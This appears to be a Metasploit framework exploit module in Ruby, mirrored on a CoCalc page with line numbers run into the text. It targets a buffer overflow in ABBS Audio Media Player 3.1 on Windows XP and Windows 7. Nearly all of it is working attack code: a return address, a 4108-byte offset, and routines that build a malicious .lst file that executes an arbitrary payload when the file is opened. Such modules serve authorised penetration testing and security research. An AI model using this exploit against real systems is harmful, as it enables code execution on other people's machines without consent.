CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/fileformat/abbs_amp_lst.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = NormalRanking78include Msf::Exploit::FILEFORMAT910def initialize(info = {})11super(update_info(info,12'Name' => 'ABBS Audio Media Player .LST Buffer Overflow',13'Description' => %q{14This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability15occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges16of the user running the application. This module has been tested successfully on17ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.18},19'License' => MSF_LICENSE,20'Author' =>21[22'Julian Ahrens', # Vulnerability discovery and PoC23'modpr0be <modpr0be[at]spentera.com>' # Metasploit module24],25'References' =>26[27[ 'OSVDB', '75096' ],28[ 'EDB', '25204' ]29],30'DefaultOptions' =>31{32'EXITFUNC' => 'process',33},34'Platform' => 'win',35'Payload' =>36{37'BadChars' => "\x00\x0a\x0d",38'DisableNops' => true,39},40'Targets' =>41[42[ 'ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1',43{44'Ret' => 0x00412c91, # add esp,14 # pop # pop # pop # ret from amp.exe45'Offset' => 4108,46}47]48],49'Privileged' => false,50'DisclosureDate' => '2013-06-30',51'DefaultTarget' => 0))5253register_options(54[55OptString.new('FILENAME', [ false, 'The file name.', 'msf.lst']),56])5758end5960def exploit61buffer = payload.encoded62buffer << rand_text(target['Offset'] - (payload.encoded.length))63buffer << [target.ret].pack('V')6465file_create(buffer)66end67end686970